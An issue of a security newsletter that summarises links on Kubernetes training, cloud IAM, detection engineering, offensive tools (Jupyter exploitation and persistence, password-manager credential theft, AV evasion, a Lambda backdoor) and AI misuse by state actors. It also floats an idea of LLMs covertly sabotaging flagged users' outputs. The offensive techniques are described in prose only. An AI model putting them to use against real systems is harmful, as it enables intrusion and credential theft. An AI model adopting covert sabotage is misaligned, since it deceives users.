• tl;dr sec
  • Posts
  • [tl;dr sec] #218 - Kubernetes Security Training Platform, Jupyter Attack Toolkit, Awesome GraphQL Security

[tl;dr sec] #218 - Kubernetes Security Training Platform, Jupyter Attack Toolkit, Awesome GraphQL Security

Nine free k8s CTF scenarios, utilities for exploiting/persisting on Jupyter instances, GraphQL security tools, libraries, resources, etc.

Hey there,

I hope you’ve been doing well!

❤️‍🔥 tl;dr Love

OK this feels a bit awkward to share, but she gave me permission.

My friend Tanya Janca recorded a quick video about some dating discussions we had a number of years ago. She recently got engaged! 🙌 

Basically, the idea is to lean into who you are and find someone super into that, vs trying to be blandly, generically appealing to everyone.

Tanya is super hardworking and smart (and kind), so I thought she should emphasize that. If a potential suitor is intimidated by successful women, it won’t work out anyway, so she might as well be upfront about it and save everyone time.

Anywho, I hope you had a wonderful consumer culture fabricated Valentine’s Day!

If you’re still looking, I’m confident that if you keep working on growing into the best version of yourself and putting yourself out there, you’ll find them 💘 

📺️ Upcoming Talks

I’m excited to be a part of Cycode’s ASPM Nation on February 29th, along with security leaders from TikTok, Ford, EY, and more. I’ll be discussing supply chain security. More on this below.

I’m also stoked to be doing a webinar with OffSec on February 28th about building a scalable security program, including useful mindsets, embracing secure defaults, and investing in a supportive security culture.

Hope to see you there! 👋 


📣 CNAPP for Geniuses (And Everyone Else)

We think great cloud security should be simple. Instead, the rest of the world is providing 50 page-long explainers.

So, we created the easiest-to-digest guide to CNAPP you will ever see. If you want the actual TL;DR on CNAPP (hint - it starts with runtime security), don’t spend days reading someone’s PhD dissertation - check out our comprehensive 8-step CNAPP guide.

Read CNAPP in 8 Simple Steps.

TL;DR’s are where it’s at! 👆️ 


A curated list of GraphQL security frameworks, libraries, software and resources. Heavily Escape Tech weighted, but some stuff from others too.

Maturing Your Threat Modeling Skills
Threat modeling legend Adam Shostack joins We Hack Purple founder Tanya Janca to discuss how to both structure and free flow to ensure comprehensive threat models, how to seamlessly integrate threat modeling into your SDLC, and more.

By FreeLabz: The pentester’s Swiss army knife. A task and workflow runner that wraps dozens of security tools, including httpx, gau, katana, ffuf, subfinder, msfconsole, wpscan, nmap, nuclei, and more.

Mercari’s passkey adoption
Nicely detailed post on adding passkeys as an authentication option, potential attack scenarios, where you might want to enforce passkeys (e.g. highly sensitive operations, adding a new passkey), potential UX concerns, the value of having a proximity boundary between the device requesting registration and the device receiving the authentication request, and more.

GitHub's Engineering Fundamentals program: How we deliver on availability, security, and accessibility
GitHub describes their Engineering Fundamentals program, a governance program to define, measure, and sustain engineering excellence. They measure progress using Scorecards, which indicate if a service has reached some expected level of performance (e.g. secret scanning).

Each service has a set of attributes that are captured and maintained in a YAML file in that repo, such as service tier (criticality to business), quality of service, service type, ownership info, sponsor, team name, and contact info. The Fundamental scorecards read the service’s YAML file and start monitoring the applicable services based on their attributes.


📣 First to see, first to detect

In today's fast-paced digital world, SMBs face a critical challenge: the lengthy 204-day average mean time to identify (MTTI) and uncover a security breach. As cyber threats soar and skilled professionals remain scarce, effective solutions are essential to tackle the newest ransomware variants.

With ESET’s MDR tailored for SMBs, you gain the upper hand against emerging ransomware strains, effectively identifying and neutralizing cyber threats. Our dedicated threat intelligence research ensures rapid detection and mitigation of cybercrime, including zero-day attacks.

By combining ESET’s AI-powered threat detection with expert human oversight, your security is strengthened with another layer of sophisticated protection.

Cloud Security

By Dirk-jan Mollema: A collection of Azure AD tools for offensive and defensive security purposes.

CIEM Part 1: How least privilege leads to a false sense of security 
In this series on Cloud Identity Entitlement Management, Robert de Meyer argues that true least privilege is impossible in most environments, that the real focus should be on protecting business-critical assets while minimizing the impact on org productivity, and walks through some IAM nuance. Part 2 is on measuring risk probability in IAM, and part 3 is on mastering privilege management for devs.

Conditional Love for AWS Metadata Enumeration
Plerion’s Daniel Grzelak on how it’s possible to read resource tags, account IDs and other metadata from any accessible AWS resource using condition keys like “aws:ResourceAccount” and “StringLike” to brute force values one character at a time. They’ve also released a tool, Conditional Love, which does not in fact repeat choice words from my parents, but automates this attack.

Container Security

By ControlPlane: A Kubernetes security training platform. It creates a Kubernetes cluster for you in your AWS account; runs scenarios which misconfigure it and/or leave it vulnerable to compromise and trains you in mitigating against these vulnerabilities. It currently has 9 CTF scenarios.

Images as Code: The pursuit of declarative image builds
Chainguard’s Matt Moore recounts the journey to declarative image builds, which required moving away from things like the imperative use of RUN in Dockerfiles. Some neat history about Bazel, creating distroless, apko, a Terraform provider for ko, and overall the technical pieces that needed to come together. I appreciate posts like this that share an arc of how and why an area has evolved over time.

Kubernetes security fundamentals: Authentication
Datadog’s Rory McCune discusses the pros and cons of various authentication methods in Kubernetes and when you might use them, including internal methods (X.509 client certificates, service account tokens), external methods (OIDC, authenticating or impersonating proxy), and authentication for other Kubernetes components (kubelet, controller manager and scheduler, kube-proxy, etcd).

To be honest, when I read posts that nicely detail the nuances of Kubernetes, I get a little sad inside and think, “This is why we can’t have nice things” 😅 

Sponsored Event

🔊Join Cycode’s ASPM Nation to get Innovative Strategies for Developing Secure Applications 🔊

Security trailblazers! You’re invited to ASPM Nation, presented by Cycode, on February 29th. At this virtual event, you’ll get CISO-tested frameworks & the very latest best practices on secure software development from impressive security leaders (from Ford, EY, TikTok, and more).

Don’t miss the special closing keynote from former Global CSO of TikTok, ADP, & EMC on why ASPM platforms are the future of application security, AND…Clint Gibler’s (founder of tl;dr sec) panel ‘The Future of Code: Securing Against Software Supply Chain Attacks’.

Let’s shape the future of application security together.

I’m stoked to be speaking at ASPM Nation, hope to see you there!

Blue Team

By WithSecure Labs: A repository of code signing certificates known to have been leaked or stolen, then abused by threat actors. Includes a Python script that can generate YARA rules for all the certs.

Identifying and Mitigating Living Off the Land Techniques
Free new 46 page PDF from CISA, NSA, and others on guidance about common living off the land (LOTL) techniques used by threat actors as well as common gaps in defense capabilities, such as observed network defense weaknesses that make it difficult to distinguish malicious activity from legitimate behavior.

Writing Practical Splunk Detection Rules — Part 1
Vit Bukac walks through a practical example of how to create a Splunk rule that identifies hosts in your network that are likely engaged in coinmining, and describes how it can be improved to include rich contextual info and minimize analyst alert fatigue. Love the extensive related work links, nice!

Getting Started with Detection-as-Code and Chronicle Security Operations
Google’s David French shares the principles and benefits of managing detection rules as code, an example detection engineering workflow, and how to configure a CI/CD pipeline job in GitLab to pull existing detection rules via Chronicle’s API and commit them to a GitLab project (code included).

In part two David, demonstrates how to create and modify detection rules via Chronicle’s API and a CI/CD pipeline.

Red Team

By NVIDIA’s Joe Lucas: A CLI application for interacting with authenticated Jupyter instances. Built-in modules for enumerating, exploiting, and persisting on the host. This could be used to backdoor or steal a model if you have initial access to the Jupyter instance (e.g. recovered a token or password).

By Slowerzs: A collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. It works by making the target application load a malicious library, which performs in-memory hooking to gather credentials.

Identifying Malicious Bytes in Malware
Zavier Lee describes how malicious byte sequences can be used by security products to identify and detect malware, and how a red teamer can identify these bytes and replace them to evade static detection. Zavier also wrote GoCheck, which identifies the exact bytes that Windows Defender AV flags by feeding byte slices to MpCmdRun.exe.

👉️ Read Online if Clipped 👈️ 

AI + Security

In a GenAI world. Only Identity Matters.
In a world (movie trailer voice) where text, images, voice, and video can be easily created for almost anything, Caleb Sima argues that identity and intent are critical, fundamental building blocks.

Required Security Changes for Secure AI Agents
Joseph Thacker proposes a number of areas that need improvement if AI agents are going to be both capable and secure, including a hardened sandbox (so compromising one service doesn’t give access to everything), credentialed UI access for services that don’t yet have an API, agent identity verification, audit logging, delegated authorization, and more.

Exploring Red Team Persistence via AWS Lex Chatbots
Lizzie Moratti walks through using an AWS Lex Service chatbot as a persistence method for a red teamer, for example, modifying a Lambda function such that when it’s provided a sleeper phrase (“the crow flies at midnight”) it will trigger malicious business logic to provide credentials for the Lambda’s role.

Disrupting malicious uses of AI by state-affiliated threat actors
OpenAI terminated accounts associated with five state-affiliated malicious actors (China, Iran, North Korea, Russia), and breaks down what they were using OpenAI services for:

  • Researching public info on various companies and cybersecurity tools, translating technical papers, identifying experts and orgs focused on defense issues, intelligence agencies and regional threat actors, satellite communication protocols and radar imaging technology.

  • Researching technical details like common ways processes could be hidden on a system, ways malware could evade detection, understanding publicly available vulnerabilities, etc.

  • Coding tasks like writing scripts, web apps, etc.

  • Generating spear phishing campaign content.

This Microsoft blog post has additional technical details, including an appendix containing a full list of the LLM-themed TTPs. “Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors’ usage of AI,” but rather incremental help.

💡 While terminating all of these actors’ accounts sounds good, I wonder if there would be more value in leaving them on- it would basically be like wiretapping adversaries and seeing what targets they were interested in, the malware they were writing, etc.

Maybe LLM providers could be super sneaky, and have the LLM, just for those accounts, introduce very subtle bugs that would allow fingerprinting of the malware or command and control systems, or insert some keywords or phrasing into phishing content that can be passed along to email providers and social media networks for easy flagging. Take advantage of owning the platform!

Lastly, Andrew Ng’s newsletter had a nice framework for thinking about different levels of privacy for AI providers. And how the text of some ancient scrolls that were turned to charcoal have been recovered using ML 🤯 


Shout-out to @securibee whose Hive Five newsletter is great and introduced me to a number of these.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!